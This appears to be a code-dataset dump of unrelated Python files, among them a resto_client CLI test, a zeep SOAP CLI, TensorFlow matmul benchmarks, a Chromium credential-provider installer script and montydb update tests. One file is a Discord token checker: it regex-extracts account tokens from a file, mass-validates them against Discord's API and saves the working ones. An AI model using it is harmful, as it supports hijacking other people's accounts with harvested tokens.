return Response(data=serializer.data, status=status.HTTP_200_OK)
def create_notification(creator, to, notification_type, image=None, comment=None):
notification = models.Notification.objects.create(
creator=creator,
to=to,
notification_type=notification_type,
image=image,
comment=comment,
)
notification.save()
| 24.59375
| 82
| 0.726811
|
794dd0cbdaa93e2af91ed7b66c579171bb48ffd0
| 7,289
|
py
|
Python
|
resto_client_tests/resto_client_cli_test.py
|
CNES/resto_client
|
7048bd79c739e33882ebd664790dcf0528e81aa4
|
[
"Apache-2.0"
] | 6
|
2019-12-20T09:12:30.000Z
|
2021-07-08T11:44:55.000Z
|
resto_client_tests/resto_client_cli_test.py
|
CNES/resto_client
|
7048bd79c739e33882ebd664790dcf0528e81aa4
|
[
"Apache-2.0"
] | null | null | null |
resto_client_tests/resto_client_cli_test.py
|
CNES/resto_client
|
7048bd79c739e33882ebd664790dcf0528e81aa4
|
[
"Apache-2.0"
] | 1
|
2019-12-17T20:16:39.000Z
|
2019-12-17T20:16:39.000Z
|
# -*- coding: utf-8 -*-
"""
.. admonition:: License
Copyright 2019 CNES
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
in compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License
is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
or implied. See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import io
from pathlib import Path
import sys
from tempfile import TemporaryDirectory
from typing import List
import unittest
from resto_client.cli.parser.resto_client_parser import build_parser
from resto_client.cli.resto_client_cli import resto_client_run
from resto_client.cli.resto_client_parameters import DOWNLOAD_DIR_KEY
from resto_client.cli.resto_client_settings import RESTO_CLIENT_SETTINGS
from resto_client.cli.resto_server_persisted import (SERVER_KEY, USERNAME_KEY, COLLECTION_KEY,
TOKEN_KEY)
import resto_client.settings.resto_client_config as resto_client_config
class TestRestoClientCli(unittest.TestCase):
"""
Basic Tests Class for resto_client Unit Test
"""
def setUp(self) -> None:
RESTO_CLIENT_SETTINGS.clear()
resto_client_run(['set', 'verbosity', 'DEBUG'])
def assert_not_in_settings(self, settings_key: str) -> None:
"""
Verify that the provided key is absent from the settings.
:param settings_key: name of the key to test
"""
self.assertNotIn(settings_key, RESTO_CLIENT_SETTINGS)
def assert_in_settings(self, settings_key: str) -> None:
"""
Verify that the provided key is present in the settings and different from None.
:param settings_key: name of the key to test
"""
self.assertIn(settings_key, RESTO_CLIENT_SETTINGS)
self.assertIsNotNone(RESTO_CLIENT_SETTINGS[settings_key])
def assert_no_account_in_settings(self) -> None:
"""
Verify that the account related keys are absent from the settings.
"""
self.assert_not_in_settings(USERNAME_KEY)
self.assert_not_in_settings(TOKEN_KEY)
def assert_no_server_in_settings(self) -> None:
"""
Verify that the server related keys are absent from the settings.
"""
self.assert_not_in_settings(SERVER_KEY)
self.assert_not_in_settings(COLLECTION_KEY)
self.assert_no_account_in_settings()
def assert_setting_equal(self, settings_key: str, expected_value: str) -> None:
"""
Verify that the provided key is present in the settings and its value is equal to the
expected one.
:param settings_key: name of the key to test
:param expected_value: expected value of the setting
"""
self.assert_in_settings(settings_key)
self.assertEqual(RESTO_CLIENT_SETTINGS[settings_key], expected_value)
@staticmethod
def get_downloaded_file_path(base_filename: str) -> Path:
"""
Returns the path in the downlaod directory of a file specified by its basename.
:param base_filename: base file name
:returns: the path to the file
"""
return (Path(RESTO_CLIENT_SETTINGS[DOWNLOAD_DIR_KEY]) /
RESTO_CLIENT_SETTINGS[SERVER_KEY] / base_filename)
def assert_downloaded_file_ok(self, base_filename: str) -> None:
"""
Verify that the download file is correct.
:param base_filename: base file name
"""
downloaded_file_path = self.get_downloaded_file_path(base_filename)
self.assertTrue(downloaded_file_path.is_file(),
'Could not find expected file: {}'.format(str(downloaded_file_path)))
def do_test_download_file(self, command: List[str], expected_files: List[str]) -> None:
"""
Test that the provided command, which is supposed to download one or several files,
succeed in downloading them.
:param command: list of words composing the command
:param expected_files: the base file names of the expected downloaded files
"""
with TemporaryDirectory() as tmp_dir:
resto_client_run(arguments=['set', 'download_dir', tmp_dir])
resto_client_run(arguments=command)
for file_name in expected_files:
self.assert_downloaded_file_ok(file_name)
# verify removing of tmp_dir
self.assertFalse(Path(tmp_dir).is_dir())
@staticmethod
def get_command_output(command: List[str]) -> str:
"""
Runs the specified resto_client command and returns its output
:param command: the command as a list of words
:returns: the command output
"""
previous_stdout = resto_client_config.RESTO_CLIENT_STDOUT
new_stdout = io.StringIO()
resto_client_config.RESTO_CLIENT_STDOUT = new_stdout
resto_client_run(arguments=command)
output = new_stdout.getvalue()
new_stdout.close()
resto_client_config.RESTO_CLIENT_STDOUT = previous_stdout
print(output)
return output.strip()
def print_parser_help(parser: argparse.ArgumentParser, arguments: List) -> None:
"""
Print one help
:param parser: a parser to launch
:param list arguments: in the form [verb, action]
"""
try:
_ = parser.parse_args(arguments + ['--help'])
except SystemExit:
pass
def print_all_help(dict_arguments: dict) -> None:
"""
Print one help
:param dict_arguments: verb, action in a dictionary form => verb : list of actions
"""
parser = build_parser()
print_parser_help(parser, [])
for verbe, actions in dict_arguments.items():
print('\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')
print(' {} '.format(verbe))
print('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')
print_parser_help(parser, [verbe])
for action in actions:
if action is not None:
print('\n----------------------------------------------------')
print(' {} {}'.format(verbe, action))
print('----------------------------------------------------')
print_parser_help(parser, [verbe, action])
def main() -> None:
"""
Command line interface to access test to print all help.
"""
settable_options = ['server', 'account', 'collection', 'region', 'download_dir', 'verbosity']
dict_arguments = {'set': settable_options,
'unset': settable_options,
'show': ['settings', 'server', 'collection', 'feature'],
'download': ['product', 'quicklook', 'thumbnail', 'annexes'],
'search': [None],
'configure_server': ['create', 'delete', 'edit', 'show']}
print_all_help(dict_arguments)
if __name__ == "__main__":
sys.exit(main()) # type: ignore
| 38.162304
| 100
| 0.634655
|
794dd121633adfafef9329e0e840cf7cfdc49418
| 2,677
|
py
|
Python
|
src/zibalzeep/__main__.py
|
imanashoorii/zibal-zeep
|
9ff7b229b0759597823da41d1dbf48c6e7b5b383
|
[
"MIT"
] | null | null | null |
src/zibalzeep/__main__.py
|
imanashoorii/zibal-zeep
|
9ff7b229b0759597823da41d1dbf48c6e7b5b383
|
[
"MIT"
] | null | null | null |
src/zibalzeep/__main__.py
|
imanashoorii/zibal-zeep
|
9ff7b229b0759597823da41d1dbf48c6e7b5b383
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import, print_function
import argparse
import logging
import logging.config
import time
from urllib.parse import urlparse
import requests
from zibalzeep.cache import SqliteCache
from zibalzeep.client import Client
from zibalzeep.settings import Settings
from zibalzeep.transports import Transport
logger = logging.getLogger("zeep")
def parse_arguments(args=None):
parser = argparse.ArgumentParser(description="Zeep: The SOAP client")
parser.add_argument(
"wsdl_file", type=str, help="Path or URL to the WSDL file", default=None
)
parser.add_argument("--cache", action="store_true", help="Enable cache")
parser.add_argument(
"--no-verify", action="store_true", help="Disable SSL verification"
)
parser.add_argument("--verbose", action="store_true", help="Enable verbose output")
parser.add_argument(
"--profile", help="Enable profiling and save output to given file"
)
parser.add_argument(
"--no-strict", action="store_true", default=False, help="Disable strict mode"
)
return parser.parse_args(args)
def main(args):
if args.verbose:
logging.config.dictConfig(
{
"version": 1,
"formatters": {"verbose": {"format": "%(name)20s: %(message)s"}},
"handlers": {
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "verbose",
}
},
"loggers": {
"zeep": {
"level": "DEBUG",
"propagate": True,
"handlers": ["console"],
}
},
}
)
if args.profile:
import cProfile
profile = cProfile.Profile()
profile.enable()
cache = SqliteCache() if args.cache else None
session = requests.Session()
if args.no_verify:
session.verify = False
result = urlparse(args.wsdl_file)
if result.username or result.password:
session.auth = (result.username, result.password)
transport = Transport(cache=cache, session=session)
st = time.time()
settings = Settings(strict=not args.no_strict)
client = Client(args.wsdl_file, transport=transport, settings=settings)
logger.debug("Loading WSDL took %sms", (time.time() - st) * 1000)
if args.profile:
profile.disable()
profile.dump_stats(args.profile)
client.wsdl.dump()
if __name__ == "__main__":
args = parse_arguments()
main(args)
| 28.784946
| 87
| 0.592081
|
794dd2965690fbe61acdf89fcfecd05fb465748f
| 2,459
|
py
|
Python
|
10_Other/Cuda Benchmarking/1_matrixMul.py
|
Arunken/PythonScripts
|
702d0a3af7a9be3311f9da0afc5285d453f15484
|
[
"Apache-2.0"
] | null | null | null |
10_Other/Cuda Benchmarking/1_matrixMul.py
|
Arunken/PythonScripts
|
702d0a3af7a9be3311f9da0afc5285d453f15484
|
[
"Apache-2.0"
] | 1
|
2021-06-02T00:58:47.000Z
|
2021-06-02T00:58:47.000Z
|
10_Other/Cuda Benchmarking/1_matrixMul.py
|
Arunken/PythonScripts
|
702d0a3af7a9be3311f9da0afc5285d453f15484
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 14 09:44:05 2018
@author: arken
"""
# ============== no cuda ==================================================
from tensorflow.python.client import device_lib
print(device_lib.list_local_devices())
import os
os.environ["CUDA_VISIBLE_DEVICES"]="1"
import tensorflow as tf
import time
n = 8000
dtype = tf.float32
with tf.device("/cpu:0"):
matrix1 = tf.Variable(tf.ones((n, n), dtype=dtype))
matrix2 = tf.Variable(tf.ones((n, n), dtype=dtype))
product = tf.matmul(matrix1, matrix2)
config = tf.ConfigProto(graph_options=tf.GraphOptions(optimizer_options=tf.OptimizerOptions(opt_level=tf.OptimizerOptions.L0)))
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
iters = 10
sess.run(product.op)
#file_writer = tf.summary.FileWriter('/path/to/logs', sess.graph)
start = time.time()
for i in range(iters):
sess.run(product.op)
end = time.time()
ops = n**3 + (n-1)*n**2 # n^2*(n-1) additions, n^3 multiplications
elapsed = (end - start)
rate = iters*ops/elapsed/10**9
print('\n %d x %d matmul took: %.2f sec, %.2f G ops/sec' % (n, n,
elapsed/iters,
rate,))
#========================= cuda support =======================================
import os
os.environ["CUDA_VISIBLE_DEVICES"]="1"
import tensorflow as tf
import time
from tensorflow.python.client import device_lib
print(device_lib.list_local_devices())
n = 8000
dtype = tf.float32
with tf.device("/GPU:0"):
matrix1 = tf.Variable(tf.ones((n, n), dtype=dtype))
matrix2 = tf.Variable(tf.ones((n, n), dtype=dtype))
product = tf.matmul(matrix1, matrix2)
config = tf.ConfigProto(graph_options=tf.GraphOptions(optimizer_options=tf.OptimizerOptions(opt_level=tf.OptimizerOptions.L0)))
with tf.Session(config=config) as sess1:
sess1.run(tf.global_variables_initializer())
iters = 10
start = time.time()
for i in range(iters):
sess1.run(product)
end = time.time()
ops = n**3 + (n-1)*n**2 # n^2*(n-1) additions, n^3 multiplications
elapsed = (end - start)
rate = iters*ops/elapsed/10**9
print('\n %d x %d matmul took: %.2f sec, %.2f G ops/sec' % (n, n,
elapsed/iters,
rate,))
| 22.354545
| 127
| 0.581944
|
794dd3ca09ebb3c86926e59925694ad627a865df
| 5,672
|
py
|
Python
|
chrome/credential_provider/build/make_setup.py
|
sarang-apps/darshan_browser
|
173649bb8a7c656dc60784d19e7bb73e07c20daa
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
chrome/credential_provider/build/make_setup.py
|
sarang-apps/darshan_browser
|
173649bb8a7c656dc60784d19e7bb73e07c20daa
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
chrome/credential_provider/build/make_setup.py
|
sarang-apps/darshan_browser
|
173649bb8a7c656dc60784d19e7bb73e07c20daa
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# This script builds the credential provider installer that is used to install
# all required components of the Google Credential Provider for Windows. The
# installer is a 7-zip self extracting executable file that wraps three main
# parts:
#
# - the Credential Provider COM DLL
# - a DLL that contains Windows EventLog message formatting
# - a setup exe that performs action required during install and uninstall
#
# In this description "installer" refers to the self extracting executable that
# wraps all the parts, whereas "setup" refers to an exe inside the installer
# that runs specific actions at install and uninstall time.
#
# When run, the installer extracts the wrapped files into a new empty
# directory under %TEMP%. The setup exe is then run to register the COM
# objects, install the message format dll, and properly register the credential
# provider with Windows. Once installation completes, the new directory
# containing the extracted files is automatically deleted.
#
# The installer can be run multiple times on the same machine. On an already
# working computer this is essentially a noop. On a damaged computer the files
# will be overwritten and the parts registered, so can be used to correct
# problems.
#
# Running a new version of the installer will replace the existing install with
# a newer one. It is not required to first uninstall the old version.
# Installation of the newer version will attempt to delete older versions if
# possible.
#
# The installer is not needed for uninstall and may be removed after initial
# install. To uninstall the Google Credential Provider for Windows, run the
# setup exe with the command line argument: /uninstall
"""Creates the GCPW self extracting installer. This script is not run manually,
it is called when building the //credential_provider:gcp_installer GN target.
All paths can be absolute or relative to $root_build_dir.
"""
import argparse
import os
import shutil
import subprocess
import sys
def GetLZMAExec(src_path):
"""Gets the path to the 7zip compression command line tool.
Args:
src_path: Full path to the source root
Returns:
The executable command to run the 7zip compressor.
"""
return (os.path.join(src_path, r'third_party\lzma_sdk\7zr.exe')
if sys.platform == 'win32' else '7zr')
def main():
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('src_path', help='Path to the source root')
parser.add_argument('cp_path',
help='Path to the credential provider directory')
parser.add_argument('root_build_path', help='$root_build_dir GN variable')
parser.add_argument('target_gen_path', help='$target_gen_dir GN variable')
args = parser.parse_args()
# Make sure all arguments are converted to absolute paths for use below.
args.src_path = os.path.abspath(args.src_path)
args.cp_path = os.path.abspath(args.cp_path)
args.root_build_path = os.path.abspath(args.root_build_path)
args.target_gen_path = os.path.abspath(args.target_gen_path)
if not os.path.isdir(args.cp_path):
parser.error('Invalid cp_path: "%s"' % args.cp_path)
if not os.path.isdir(args.src_path):
parser.error('Invalid src_path: "%s"' % args.src_path)
# Absolute path to gcp installer.
gcp_installer_fn = os.path.join(args.root_build_path, 'gcp_installer.exe')
gcp_7z_fn = os.path.join(args.root_build_path, 'gcp.7z')
sz_fn = GetLZMAExec(args.src_path)
sfx_fn = os.path.join(args.root_build_path, 'gcp_sfx.exe')
# Build the command line for updating files in the GCP 7z archive.
cmd = [
sz_fn, # Path to 7z executable.
'u', # Update file in archive.
# The follow options are equivalent to -mx9 with bcj2 turned on.
# Because //third_party/lzma_sdk is only partial copy of the ful sdk
# it does not support all forms of compression. Make sure to use
# compression that is compatible. These same options are used when
# building the chrome install compressed files.
'-m0=BCJ2',
'-m1=LZMA:d27:fb128',
'-m2=LZMA:d22:fb128:mf=bt2',
'-m3=LZMA:d22:fb128:mf=bt2',
'-mb0:1',
'-mb0s1:2',
'-mb0s2:3',
# Full path to archive.
gcp_7z_fn,
]
# Because of the way that 7zS2.sfx determine what program to run after
# extraction, only gcp_setup.exe should be placed in the root of the archive.
# Other "executable" type files (bat, cmd, exe, inf, msi, html, htm) should
# be located only in subfolders.
# Add the credential provider dll and setup programs to the archive.
# If the files added to the archive are changed, make sure to update the
# kFilenames array in setup_lib.cc.
# 7zip and copy commands don't have a "silent" mode, so redirecting stdout
# and stderr to nul.
with open(os.devnull) as nul_file:
os.chdir(args.root_build_path)
subprocess.check_call(cmd + ['gaia1_0.dll'], stdout=nul_file)
subprocess.check_call(cmd + ['gcp_setup.exe'], stdout=nul_file)
subprocess.check_call(cmd + ['gcp_eventlog_provider.dll'], stdout=nul_file)
# Combine the SFX module with the archive to make a self extracting
# executable.
with open(gcp_installer_fn, 'wb') as output:
with open (sfx_fn, 'rb') as input:
shutil.copyfileobj(input, output)
with open (gcp_7z_fn, 'rb') as input:
shutil.copyfileobj(input, output)
return 0
if __name__ == '__main__':
sys.exit(main())
| 38.849315
| 80
| 0.732017
|
794dd45f225b7bc3d2d7a02ac6ed80f2fcd23765
| 7,783
|
py
|
Python
|
tests/test_engine/test_update/test_update_mul.py
|
bobuk/montydb
|
9ee299e7f1d3a7236abb683e0dfe4f7817859b2c
|
[
"BSD-3-Clause"
] | 478
|
2019-07-31T00:48:11.000Z
|
2022-03-18T09:12:29.000Z
|
tests/test_engine/test_update/test_update_mul.py
|
bobuk/montydb
|
9ee299e7f1d3a7236abb683e0dfe4f7817859b2c
|
[
"BSD-3-Clause"
] | 47
|
2019-07-28T10:12:22.000Z
|
2022-01-04T16:25:12.000Z
|
tests/test_engine/test_update/test_update_mul.py
|
bobuk/montydb
|
9ee299e7f1d3a7236abb683e0dfe4f7817859b2c
|
[
"BSD-3-Clause"
] | 26
|
2019-08-09T14:28:29.000Z
|
2022-02-22T02:49:51.000Z
|
import pytest
from pymongo.errors import WriteError as mongo_write_err
from montydb.errors import WriteError as monty_write_err
from montydb.types import bson
from ...conftest import skip_if_no_bson
def test_update_mul_1(monty_update, mongo_update):
docs = [
{"a": 1}
]
spec = {"$mul": {"a": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": 2}
def test_update_mul_2(monty_update, mongo_update):
docs = [
{"a": [1]}
]
spec = {"$mul": {"a": 2}}
with pytest.raises(mongo_write_err) as mongo_err:
mongo_update(docs, spec)
with pytest.raises(monty_write_err) as monty_err:
monty_update(docs, spec)
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_update_mul_3(monty_update, mongo_update):
docs = [
{"a": 1}
]
spec = {"$mul": {"a": "2"}}
with pytest.raises(mongo_write_err) as mongo_err:
mongo_update(docs, spec)
with pytest.raises(monty_write_err) as monty_err:
monty_update(docs, spec)
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_update_mul_4(monty_update, mongo_update):
docs = [
{"a": [1, 2]}
]
spec = {"$mul": {"a.1": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [1, 4]}
def test_update_mul_5(monty_update, mongo_update):
docs = [
{"a": {"b": 1}}
]
spec = {"$mul": {"a.b": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": {"b": 2}}
def test_update_mul_6(monty_update, mongo_update):
docs = [
{"a": {"b": [1, 2]}}
]
spec = {"$mul": {"a.b.1": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": {"b": [1, 4]}}
def test_update_mul_7(monty_update, mongo_update):
docs = [
{"a": [{"b": 0}, {"b": 1}]}
]
spec = {"$mul": {"a.b": 2}}
with pytest.raises(mongo_write_err) as mongo_err:
mongo_update(docs, spec)
with pytest.raises(monty_write_err) as monty_err:
next(monty_update(docs, spec))
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_update_mul_8(monty_update, mongo_update):
docs = [
{"a": [{"b": 0}, {"b": 1}]}
]
spec = {"$mul": {"a.3.c": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [{"b": 0}, {"b": 1}, None, {"c": 0.0}]}
def test_update_mul_9(monty_update, mongo_update):
docs = [
{"a": [1, {"1": 2}, {"1": 3}]}
]
spec = {"$mul": {"a.1.2": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [1, {"1": 2, "2": 0.0}, {"1": 3}]}
def test_update_mul_10(monty_update, mongo_update):
docs = [
{"a": [1, {"1": 2}]}
]
spec = {"$mul": {"x.1.2": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [1, {"1": 2}], "x": {"1": {"2": 0.0}}}
def test_update_mul_positional_1(monty_update, mongo_update):
docs = [
{"a": [{"b": 3}, {"b": 4}]}
]
spec = {"$mul": {"a.$.b": 2}}
find = {"a.b": 4}
monty_c = monty_update(docs, spec, find)
mongo_c = mongo_update(docs, spec, find)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [{"b": 3}, {"b": 8}]}
def test_update_mul_positional_all_1(monty_update, mongo_update):
docs = [
{"a": [{"b": 3}, {"b": 4}]}
]
spec = {"$mul": {"a.$[].b": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [{"b": 6}, {"b": 8}]}
def test_update_mul_positional_filtered_1(monty_update, mongo_update):
docs = [
{"a": [{"b": 4, "c": 1}, {"b": 4, "c": 0}]}
]
spec = {"$mul": {"a.$[elem].b": 2}}
array_filters = [{"elem.c": {"$gt": 0}}]
monty_c = monty_update(docs, spec, array_filters=array_filters)
mongo_c = mongo_update(docs, spec, array_filters=array_filters)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [{"b": 8, "c": 1}, {"b": 4, "c": 0}]}
def test_update_mul_positional_filtered_2(monty_update, mongo_update):
docs = [
{"a": [{"b": 4, "c": 1}, {"b": 5, "c": 1}, {"b": 4, "c": 0}]}
]
spec = {"$mul": {"a.$[elem].b": 2}}
array_filters = [{"elem.c": {"$gt": 0}, "elem.b": {"$gt": 4}}]
monty_c = monty_update(docs, spec, array_filters=array_filters)
mongo_c = mongo_update(docs, spec, array_filters=array_filters)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [
{"b": 4, "c": 1}, {"b": 10, "c": 1}, {"b": 4, "c": 0}]}
def test_update_mul_positional_filtered_3(monty_update, mongo_update):
docs = [
{"a": [5, 2]}
]
spec = {"$mul": {"a.$[elem]": 10}}
array_filters = [{"elem": {"$lt": 4}}]
monty_c = monty_update(docs, spec, array_filters=array_filters)
mongo_c = mongo_update(docs, spec, array_filters=array_filters)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [5, 20]}
def test_update_mul_float(monty_update, mongo_update):
docs = [
{"a": 2}
]
spec = {"$mul": {"a": 1.5}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": 3.0}
@skip_if_no_bson
def test_update_mul_int64(monty_update, mongo_update):
docs = [
{"a": bson.Int64(2)}
]
spec = {"$mul": {"a": 1.5}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": 3.0}
@skip_if_no_bson
def test_update_mul_decimal128(monty_update, mongo_update):
docs = [
{"a": bson.Decimal128("1.5")}
]
spec = {"$mul": {"a": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": bson.Decimal128("3.0")}
def test_update_mul_null(monty_update, mongo_update):
docs = [
{"a": None}
]
spec = {"$mul": {"a": 2}}
with pytest.raises(mongo_write_err) as mongo_err:
mongo_update(docs, spec)
with pytest.raises(monty_write_err) as monty_err:
next(monty_update(docs, spec))
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_update_mul_bool(monty_update, mongo_update):
docs = [
{"a": True}
]
spec = {"$mul": {"a": 2}}
with pytest.raises(mongo_write_err) as mongo_err:
mongo_update(docs, spec)
with pytest.raises(monty_write_err) as monty_err:
next(monty_update(docs, spec))
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
| 25.434641
| 73
| 0.588077
|
794dd51c70497c0d2598e1a62e9984d2bd0cdf61
| 2,817
|
py
|
Python
|
Testing/Generator/checker.py
|
PajekRadek/test
|
611b4f990fa7214227ac95d2ba85b0e336cc52d4
|
[
"MIT"
] | null | null | null |
Testing/Generator/checker.py
|
PajekRadek/test
|
611b4f990fa7214227ac95d2ba85b0e336cc52d4
|
[
"MIT"
] | null | null | null |
Testing/Generator/checker.py
|
PajekRadek/test
|
611b4f990fa7214227ac95d2ba85b0e336cc52d4
|
[
"MIT"
] | null | null | null |
import asyncio
import aiosonic
import re
import os
import time
import threading
from tasksio import TaskPool
from colorama import init, Fore, Back, Style
init(convert=True)
TOKENS_LOADED = 0
TOKENS_INVALID = 0
TOKENS_LOCKED = 0
TOKENS_VALID = 0
TOKENS_VALID_LIST = []
def filter_tokens(unfiltered):
tokens = []
for line in [x.strip() for x in unfiltered.readlines() if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
for token in re.findall(regex, line):
if token not in tokens:
tokens.append(token)
return tokens
def title_worker():
global TOKENS_INVALID, TOKENS_LOCKED, TOKENS_VALID, TOKENS_LOADED
while True:
os.system(f"title Tokens Loaded: {TOKENS_LOADED} ^| Valid: {TOKENS_VALID} ^| Locked: {TOKENS_LOCKED} ^| Invalid: {TOKENS_INVALID}")
time.sleep(0.1)
threading.Thread(target=title_worker, daemon=True).start()
async def check(token, client):
global TOKENS_INVALID, TOKENS_LOCKED, TOKENS_VALID, TOKENS_VALID_LIST
response = await client.get("https://discord.com/api/v9/users/@me/guild-events", headers={
"Authorization": token,
"Content-Type": "application/json"
})
if response.status_code == 200:
TOKENS_VALID += 1
TOKENS_VALID_LIST.append(token)
print(f'{Fore.GREEN}[VALID] {token}')
elif response.status_code == 401:
TOKENS_INVALID += 1
print(f'{Fore.RED}[INVALID] {token}')
elif response.status_code == 403:
TOKENS_LOCKED += 1
print(f'{Fore.RED}[LOCKED] {token}')
async def main():
global TOKENS_INVALID, TOKENS_LOCKED, TOKENS_VALID, TOKENS_LOADED, TOKENS_VALID_LIST
client = aiosonic.HTTPClient()
try:
with open('tokens.txt', 'r') as tokens:
filtered = filter_tokens(tokens)
TOKENS_LOADED = len(filtered)
async with TaskPool(10_000) as pool:
for token in filtered:
await pool.put(check(token, client))
print(f"{Fore.WHITE}Tokens Loaded: {TOKENS_LOADED} | Valid: {TOKENS_VALID} | Locked: {TOKENS_LOCKED} | Invalid: {TOKENS_INVALID}")
with open(f'working.txt', 'w') as handle:
handle.write('\n'.join(TOKENS_VALID_LIST))
handle.close()
input("Saved to working.txt, click enter to exit.")
except Exception as e:
print(e)
input('Can\'t open tokens.txt\nClick enter to exit!')
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| 32.755814
| 147
| 0.587859
|
794dd56a1523b27531f48737d515e251f07fc768
| 6,199
|
py
|
Python
|
S4_3_Unknown_AD/cnn_lstm.py
|
gaofujie1997/ECG-ADGAN
|
ee48bd4c8e5992d0e1180fb7bdf85b126ceba146
|
[
"MIT"
] | 2
|
2022-03-22T09:31:08.000Z
|
2022-03-22T09:41:30.000Z
|
S4_3_Unknown_AD/cnn_lstm.py
|
gaofujie1997/ECG-ADGAN
|
ee48bd4c8e5992d0e1180fb7bdf85b126ceba146
|
[
"MIT"
] | null | null | null |
S4_3_Unknown_AD/cnn_lstm.py
|
gaofujie1997/ECG-ADGAN
|
ee48bd4c8e5992d0e1180fb7bdf85b126ceba146
|
[
"MIT"
] | null | null | null |
import pickle
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix
X_N = pickle.load(open("../data/X_AMMI_N.pkl", "rb"))[0:1000]
print(np.shape(X_N))
X_N_label = np.zeros([np.shape(X_N)[0], 1])
X_S = pickle.load(open("../data/X_AMMI_S.pkl", "rb"))[0:330]
print(np.shape(X_S))
X_S_label = np.zeros([np.shape(X_S)[0], 1]) + 1
X_V = pickle.load(open("../data/X_AMMI_V.pkl", "rb"))[0:330]
print(np.shape(X_V))
X_V_label = np.zeros([np.shape(X_V)[0], 1]) + 1
X_F = pickle.load(open("../data/X_AMMI_F.pkl", "rb"))[0:330]
print(np.shape(X_F))
X_F_label = np.zeros([np.shape(X_F)[0], 1]) + 1
X_Q = pickle.load(open("../data/X_AMMI_Q.pkl", "rb"))[0:15]
print(np.shape(X_Q))
X_Q_label = np.zeros([np.shape(X_Q)[0], 1]) + 1
X_N_test = pickle.load(open("../data/X_AMMI_N.pkl", "rb"))[1000:1330]
print(np.shape(X_N_test))
X_N_test_label = np.zeros([np.shape(X_N_test)[0], 1])
X_S_test = pickle.load(open("../data/X_AMMI_S.pkl", "rb"))[330:660]
print(np.shape(X_S_test))
X_S_test_label = np.zeros([np.shape(X_S_test)[0], 1]) + 1
X_V_test = pickle.load(open("../data/X_AMMI_V.pkl", "rb"))[330:660]
print(np.shape(X_V_test))
X_V_test_label = np.zeros([np.shape(X_V_test)[0], 1]) + 1
X_F_test = pickle.load(open("../data/X_AMMI_F.pkl", "rb"))[330:660]
print(np.shape(X_F_test))
X_F_test_label = np.zeros([np.shape(X_F_test)[0], 1]) + 1
X_Q_test = pickle.load(open("../data/X_AMMI_Q.pkl", "rb"))[15:30]
print(np.shape(X_Q_test))
X_Q_test_label = np.zeros([np.shape(X_Q_test)[0], 1]) + 1
def buildModel():
newModel = tf.keras.models.Sequential([
tf.keras.layers.InputLayer(input_shape=(216, 1)),
# 第一个卷积层, 4 个 21x1 卷积核
